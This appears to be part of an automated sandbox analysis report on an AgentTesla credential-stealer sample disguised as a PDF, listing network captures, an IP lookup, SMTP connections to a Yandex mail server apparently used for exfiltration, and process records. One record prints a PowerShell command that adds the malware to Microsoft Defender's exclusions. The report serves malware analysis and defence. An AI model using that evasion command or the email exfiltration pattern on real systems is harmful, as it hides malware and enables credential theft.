                                                        Dec 6, 2024 10:01:46.085789919 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.085827112 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.085839033 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.085863113 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.085872889 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.085912943 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.085927963 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.085958004 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.085968018 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.086016893 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.086026907 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.086072922 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.202270031 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.202320099 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.205423117 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.205476046 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.205504894 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.205553055 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.205562115 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.205595970 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.205676079 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.205687046 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.205723047 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.205751896 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.205754042 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.205797911 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.205802917 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.205840111 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.205888987 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.205929041 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.205933094 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.205971956 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.206067085 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.206119061 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.249032974 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.249092102 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.322384119 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.322447062 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.325489044 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.325540066 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.325655937 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.325726032 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.325753927 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.325809002 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.325839043 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.325879097 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.325889111 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.325982094 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326001883 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:46.326024055 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326111078 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326152086 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326231956 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326241970 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326312065 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326322079 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326431036 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326442003 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326459885 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326498985 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326581955 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326592922 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326626062 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326684952 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326739073 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326798916 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.326808929 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.368930101 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.369050026 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.442338943 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.442356110 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.442372084 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.442385912 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.445242882 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.445283890 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.445353985 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.445363998 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.445487976 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.445499897 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.445595980 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.445607901 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.445723057 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.445732117 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.445830107 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.445839882 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:46.445875883 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:47.472491980 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:47.516925097 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:56.564415932 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:56.684164047 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:57.012599945 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:57.012672901 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:57.012712002 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:57.013453007 CET49728587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:57.015892982 CET49729587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:57.133325100 CET5874972877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:57.135802031 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:57.135950089 CET49729587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:58.641333103 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:58.678913116 CET49729587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:58.798820019 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:59.130197048 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:59.130343914 CET49729587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:59.250112057 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:59.580024958 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:01:59.580395937 CET49729587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:01:59.700215101 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:00.031255960 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:00.031286955 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:00.031301975 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:00.031341076 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:00.031352997 CET49729587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:02:00.031388998 CET49729587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:02:00.033219099 CET49729587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:02:00.152947903 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:00.482732058 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:00.483952045 CET49729587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:02:00.603759050 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:00.936158895 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:00.936403990 CET49729587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:02:01.056515932 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:01.064589977 CET49729587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:02:01.115850925 CET49730587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:02:01.185018063 CET5874972977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:01.186456919 CET49729587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:02:01.235713005 CET5874973077.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:01.238338947 CET49730587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:02:02.613713980 CET5874973077.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:02.751725912 CET49730587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:02:04.110584021 CET49730587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:02:04.110727072 CET49730587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:02:04.170556068 CET49731587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:02:04.230304956 CET5874973077.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:04.230772972 CET5874973077.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:04.230825901 CET49730587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:02:04.290254116 CET5874973177.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:04.290330887 CET49731587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:02:05.583281994 CET5874973177.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:02:05.626781940 CET49731587192.168.2.877.88.21.158

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 6, 2024 09:57:57.841480017 CET6227453192.168.2.81.1.1.1
                                                        Dec 6, 2024 09:57:57.978837967 CET53622741.1.1.1192.168.2.8
                                                        Dec 6, 2024 09:58:00.639055967 CET5194853192.168.2.81.1.1.1
                                                        Dec 6, 2024 09:58:00.871653080 CET53519481.1.1.1192.168.2.8

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 6, 2024 09:57:57.841480017 CET192.168.2.81.1.1.10x6652Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                        Dec 6, 2024 09:58:00.639055967 CET192.168.2.81.1.1.10x9daaStandard query (0)smtp.yandex.ruA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 6, 2024 09:57:57.978837967 CET1.1.1.1192.168.2.80x6652No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                        Dec 6, 2024 09:57:57.978837967 CET1.1.1.1192.168.2.80x6652No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                        Dec 6, 2024 09:57:57.978837967 CET1.1.1.1192.168.2.80x6652No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                        Dec 6, 2024 09:58:00.871653080 CET1.1.1.1192.168.2.80x9daaNo error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • api.ipify.org

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.849709104.26.13.2054438048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-06 08:57:59 UTC155OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                        Host: api.ipify.org
                                                        Connection: Keep-Alive
                                                        2024-12-06 08:57:59 UTC424INHTTP/1.1 200 OK
                                                        Date: Fri, 06 Dec 2024 08:57:59 GMT
                                                        Content-Type: text/plain
                                                        Content-Length: 12
                                                        Connection: close
                                                        Vary: Origin
                                                        CF-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 8edb12539f7b0fa9-EWR
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1595&rtt_var=603&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1830721&cwnd=252&unsent_bytes=0&cid=cbbf369ebed597c3&ts=560&x=0"
                                                        2024-12-06 08:57:59 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                                                        Data Ascii: 8.46.123.228


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.849713104.26.13.2054431608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-06 08:58:05 UTC155OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                        Host: api.ipify.org
                                                        Connection: Keep-Alive
                                                        2024-12-06 08:58:05 UTC425INHTTP/1.1 200 OK
                                                        Date: Fri, 06 Dec 2024 08:58:05 GMT
                                                        Content-Type: text/plain
                                                        Content-Length: 12
                                                        Connection: close
                                                        Vary: Origin
                                                        CF-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 8edb12786ac04373-EWR
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1553&rtt_var=586&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1862244&cwnd=232&unsent_bytes=0&cid=ece305e22fc1a9d4&ts=1276&x=0"
                                                        2024-12-06 08:58:05 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                                                        Data Ascii: 8.46.123.228


                                                        SMTP Packets

                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                        Dec 6, 2024 09:58:02.258879900 CET5874971177.88.21.158192.168.2.8220 mail-nwsmtp-smtp-production-main-95.klg.yp-c.yandex.net Ok 1733475482-1wdpmS0OgSw0
                                                        Dec 6, 2024 09:58:02.259371996 CET49711587192.168.2.877.88.21.158EHLO 932923
                                                        Dec 6, 2024 09:58:02.704390049 CET5874971177.88.21.158192.168.2.8250-mail-nwsmtp-smtp-production-main-95.klg.yp-c.yandex.net
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-SIZE 53477376
                                                        250-STARTTLS
                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                        250-DSN
                                                        250 ENHANCEDSTATUSCODES
                                                        Dec 6, 2024 09:58:02.704605103 CET49711587192.168.2.877.88.21.158STARTTLS
                                                        Dec 6, 2024 09:58:03.148261070 CET5874971177.88.21.158192.168.2.8220 Go ahead
                                                        Dec 6, 2024 09:58:07.788992882 CET5874971477.88.21.158192.168.2.8220 mail-nwsmtp-smtp-production-main-42.myt.yp-c.yandex.net Ok 1733475487-7wdt1X0OkeA0
                                                        Dec 6, 2024 09:58:07.851206064 CET49714587192.168.2.877.88.21.158EHLO 932923
                                                        Dec 6, 2024 09:58:08.292675972 CET5874971477.88.21.158192.168.2.8250-mail-nwsmtp-smtp-production-main-42.myt.yp-c.yandex.net
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-SIZE 53477376
                                                        250-STARTTLS
                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                        250-DSN
                                                        250 ENHANCEDSTATUSCODES
                                                        Dec 6, 2024 09:58:08.292859077 CET49714587192.168.2.877.88.21.158STARTTLS
                                                        Dec 6, 2024 09:58:08.735126019 CET5874971477.88.21.158192.168.2.8220 Go ahead
                                                        Dec 6, 2024 09:59:40.752027035 CET5874971777.88.21.158192.168.2.8220 mail-nwsmtp-smtp-production-main-73.iva.yp-c.yandex.net Ok 1733475580-exdJkR0OcKo0
                                                        Dec 6, 2024 09:59:40.754328012 CET49717587192.168.2.877.88.21.158EHLO 932923
                                                        Dec 6, 2024 09:59:41.197756052 CET5874971777.88.21.158192.168.2.8250-mail-nwsmtp-smtp-production-main-73.iva.yp-c.yandex.net
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-SIZE 53477376
                                                        250-STARTTLS
                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                        250-DSN
                                                        250 ENHANCEDSTATUSCODES
                                                        Dec 6, 2024 09:59:41.197930098 CET49717587192.168.2.877.88.21.158STARTTLS
                                                        Dec 6, 2024 09:59:41.641289949 CET5874971777.88.21.158192.168.2.8220 Go ahead
                                                        Dec 6, 2024 09:59:45.472902060 CET5874971877.88.21.158192.168.2.8220 mail-nwsmtp-smtp-production-main-81.myt.yp-c.yandex.net Ok 1733475585-jxdB9T0OeSw0
                                                        Dec 6, 2024 09:59:45.473053932 CET49718587192.168.2.877.88.21.158EHLO 932923
                                                        Dec 6, 2024 09:59:45.910792112 CET5874971877.88.21.158192.168.2.8250-mail-nwsmtp-smtp-production-main-81.myt.yp-c.yandex.net
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-SIZE 53477376
                                                        250-STARTTLS
                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                        250-DSN
                                                        250 ENHANCEDSTATUSCODES
                                                        Dec 6, 2024 09:59:45.914331913 CET49718587192.168.2.877.88.21.158STARTTLS
                                                        Dec 6, 2024 09:59:46.352365971 CET5874971877.88.21.158192.168.2.8220 Go ahead
                                                        Dec 6, 2024 10:00:05.703500032 CET5874971977.88.21.158192.168.2.8220 mail-nwsmtp-smtp-production-canary-88.sas.yp-c.yandex.net Ok 1733475605-50e6nt0Ola60
                                                        Dec 6, 2024 10:00:05.703707933 CET49719587192.168.2.877.88.21.158EHLO 932923
                                                        Dec 6, 2024 10:00:06.209274054 CET5874971977.88.21.158192.168.2.8250-mail-nwsmtp-smtp-production-canary-88.sas.yp-c.yandex.net
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-SIZE 53477376
                                                        250-STARTTLS
                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                        250-DSN
                                                        250 ENHANCEDSTATUSCODES
                                                        Dec 6, 2024 10:00:06.209403992 CET49719587192.168.2.877.88.21.158STARTTLS
                                                        Dec 6, 2024 10:00:06.716888905 CET5874971977.88.21.158192.168.2.8220 Go ahead
                                                        Dec 6, 2024 10:00:09.193243980 CET5874972077.88.21.158192.168.2.8220 mail-nwsmtp-smtp-production-main-25.sas.yp-c.yandex.net Ok 1733475608-80eCbl0OkCg0
                                                        Dec 6, 2024 10:00:09.193545103 CET49720587192.168.2.877.88.21.158EHLO 932923
                                                        Dec 6, 2024 10:00:10.885482073 CET5874972177.88.21.158192.168.2.8220 mail-nwsmtp-smtp-production-main-81.myt.yp-c.yandex.net Ok 1733475610-A0elLT0Oha60
                                                        Dec 6, 2024 10:00:10.885656118 CET49721587192.168.2.877.88.21.158EHLO 932923
                                                        Dec 6, 2024 10:00:11.318614006 CET5874972177.88.21.158192.168.2.8250-mail-nwsmtp-smtp-production-main-81.myt.yp-c.yandex.net
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-SIZE 53477376
                                                        250-STARTTLS
                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                        250-DSN
                                                        250 ENHANCEDSTATUSCODES
                                                        Dec 6, 2024 10:00:11.318835974 CET49721587192.168.2.877.88.21.158STARTTLS
                                                        Dec 6, 2024 10:00:11.751651049 CET5874972177.88.21.158192.168.2.8220 Go ahead
                                                        Dec 6, 2024 10:00:16.006701946 CET5874972477.88.21.158192.168.2.8220 mail-nwsmtp-smtp-production-main-92.myt.yp-c.yandex.net Ok 1733475615-F0emQQ0OdSw0
                                                        Dec 6, 2024 10:00:16.006851912 CET49724587192.168.2.877.88.21.158EHLO 932923
                                                        Dec 6, 2024 10:00:16.459825993 CET5874972477.88.21.158192.168.2.8250-mail-nwsmtp-smtp-production-main-92.myt.yp-c.yandex.net
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-SIZE 53477376
                                                        250-STARTTLS
                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                        250-DSN
                                                        250 ENHANCEDSTATUSCODES
                                                        Dec 6, 2024 10:00:16.459983110 CET49724587192.168.2.877.88.21.158STARTTLS
                                                        Dec 6, 2024 10:00:16.920770884 CET5874972477.88.21.158192.168.2.8220 Go ahead
                                                        Dec 6, 2024 10:01:03.400199890 CET5874972577.88.21.158192.168.2.8220 mail-nwsmtp-smtp-production-main-84.vla.yp-c.yandex.net Ok 1733475663-31e08a0OdW20
                                                        Dec 6, 2024 10:01:03.400387049 CET49725587192.168.2.877.88.21.158EHLO 932923
                                                        Dec 6, 2024 10:01:03.844084024 CET5874972577.88.21.158192.168.2.8250-mail-nwsmtp-smtp-production-main-84.vla.yp-c.yandex.net
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-SIZE 53477376
                                                        250-STARTTLS
                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                        250-DSN
                                                        250 ENHANCEDSTATUSCODES
                                                        Dec 6, 2024 10:01:03.844413042 CET49725587192.168.2.877.88.21.158STARTTLS
                                                        Dec 6, 2024 10:01:04.287841082 CET5874972577.88.21.158192.168.2.8220 Go ahead
                                                        Dec 6, 2024 10:01:19.813443899 CET5874972677.88.21.158192.168.2.8220 mail-nwsmtp-smtp-production-main-77.klg.yp-c.yandex.net Ok 1733475679-J1eOkY0OcSw0
                                                        Dec 6, 2024 10:01:19.813644886 CET49726587192.168.2.877.88.21.158EHLO 932923
                                                        Dec 6, 2024 10:01:20.253623009 CET5874972677.88.21.158192.168.2.8250-mail-nwsmtp-smtp-production-main-77.klg.yp-c.yandex.net
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-SIZE 53477376
                                                        250-STARTTLS
                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                        250-DSN
                                                        250 ENHANCEDSTATUSCODES
                                                        Dec 6, 2024 10:01:20.253770113 CET49726587192.168.2.877.88.21.158STARTTLS
                                                        Dec 6, 2024 10:01:20.693733931 CET5874972677.88.21.158192.168.2.8220 Go ahead
                                                        Dec 6, 2024 10:01:29.462974072 CET5874972777.88.21.158192.168.2.8220 mail-nwsmtp-smtp-production-main-64.vla.yp-c.yandex.net Ok 1733475689-S1e1Dh0OeiE0
                                                        Dec 6, 2024 10:01:29.465564966 CET49727587192.168.2.877.88.21.158EHLO 932923
                                                        Dec 6, 2024 10:01:29.916305065 CET5874972777.88.21.158192.168.2.8250-mail-nwsmtp-smtp-production-main-64.vla.yp-c.yandex.net
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-SIZE 53477376
                                                        250-STARTTLS
                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                        250-DSN
                                                        250 ENHANCEDSTATUSCODES
                                                        Dec 6, 2024 10:01:29.921351910 CET49727587192.168.2.877.88.21.158STARTTLS
                                                        Dec 6, 2024 10:01:30.379811049 CET5874972777.88.21.158192.168.2.8220 Go ahead
                                                        Dec 6, 2024 10:01:41.320658922 CET5874972877.88.21.158192.168.2.8220 mail-nwsmtp-smtp-production-main-91.sas.yp-c.yandex.net Ok 1733475701-e1exRY0Of4Y0
                                                        Dec 6, 2024 10:01:41.320804119 CET49728587192.168.2.877.88.21.158EHLO 932923
                                                        Dec 6, 2024 10:01:41.769030094 CET5874972877.88.21.158192.168.2.8250-mail-nwsmtp-smtp-production-main-91.sas.yp-c.yandex.net
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-SIZE 53477376
                                                        250-STARTTLS
                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                        250-DSN
                                                        250 ENHANCEDSTATUSCODES
                                                        Dec 6, 2024 10:01:41.773201942 CET49728587192.168.2.877.88.21.158STARTTLS
                                                        Dec 6, 2024 10:01:42.221472025 CET5874972877.88.21.158192.168.2.8220 Go ahead
                                                        Dec 6, 2024 10:01:58.641333103 CET5874972977.88.21.158192.168.2.8220 mail-nwsmtp-smtp-production-main-72.klg.yp-c.yandex.net Ok 1733475718-w1euTa0OjW20
                                                        Dec 6, 2024 10:01:58.678913116 CET49729587192.168.2.877.88.21.158EHLO 932923
                                                        Dec 6, 2024 10:01:59.130197048 CET5874972977.88.21.158192.168.2.8250-mail-nwsmtp-smtp-production-main-72.klg.yp-c.yandex.net
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-SIZE 53477376
                                                        250-STARTTLS
                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                        250-DSN
                                                        250 ENHANCEDSTATUSCODES
                                                        Dec 6, 2024 10:01:59.130343914 CET49729587192.168.2.877.88.21.158STARTTLS
                                                        Dec 6, 2024 10:01:59.580024958 CET5874972977.88.21.158192.168.2.8220 Go ahead
                                                        Dec 6, 2024 10:02:02.613713980 CET5874973077.88.21.158192.168.2.8220 mail-nwsmtp-smtp-production-main-31.vla.yp-c.yandex.net Ok 1733475722-22e7Yq0OmiE0
                                                        Dec 6, 2024 10:02:04.110584021 CET49730587192.168.2.877.88.21.158EHLO 932923
                                                        Dec 6, 2024 10:02:05.583281994 CET5874973177.88.21.158192.168.2.8220 mail-nwsmtp-smtp-production-main-31.sas.yp-c.yandex.net Ok 1733475725-52e6fl0OjGk0

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:03:57:53
                                                        Start date:06/12/2024
                                                        Path:C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe"
                                                        Imagebase:0xf80000
                                                        File size:785'408 bytes
                                                        MD5 hash:2293CE96EC6BF9E7D7214091D74E4C35
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1429937716.0000000004B82000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1429937716.0000000004B82000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:03:57:55
                                                        Start date:06/12/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe"
                                                        Imagebase:0xf30000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:03:57:55
                                                        Start date:06/12/2024
